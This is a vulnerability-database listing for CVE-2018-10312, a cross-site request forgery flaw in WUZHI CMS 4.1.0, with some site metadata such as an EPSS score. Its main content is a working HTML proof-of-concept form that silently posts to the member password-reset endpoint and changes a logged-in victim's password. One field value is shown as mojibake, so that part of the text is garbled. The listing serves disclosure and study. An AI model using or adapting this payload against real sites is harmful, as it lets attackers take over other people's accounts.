Lucene search

K
zdtJiguang1337DAY-ID-30234
HistoryApr 24, 2018 - 12:00 a.m.

Wuzhi CMS 4.1.0 Cross Site Request Forgery Vulnerability

2018-04-2400:00:00
jiguang
0day.today
24

EPSS

0.002

Percentile

56.8%

Exploit for php platform in category web applications

# Exploit Title: WUZHI CMS 4.1.0 - Cross-Site Request Forgery
# Exploit Author: jiguang ([emailย protected])
# Vendor Homepage: https://github.com/wuzhicms/wuzhicms
# Software Link: https://github.com/wuzhicms/wuzhicms
# Version: 4.1.0
# CVE: CVE-2018-10312
 
An issue was discovered in WUZHI CMS 4.1.0 (https://github.com/wuzhicms/wuzhicms/issues/132)
There is a  csrf vulnerability that can modifying the member's password. via index.php?m=member&v=pw_reset
After the member logged in. open the exp page
 
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/www/index.php?m=member&v=pw_reset" method="POST">
      <input type="hidden" name="password" value="yuduo" />
      <input type="hidden" name="password2" value="yuduo" />
      <input type="hidden" name="submit" value="ASSยกยฎ AY=ยฎลก" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

#  0day.today [2018-04-26]  #

EPSS

0.002

Percentile

56.8%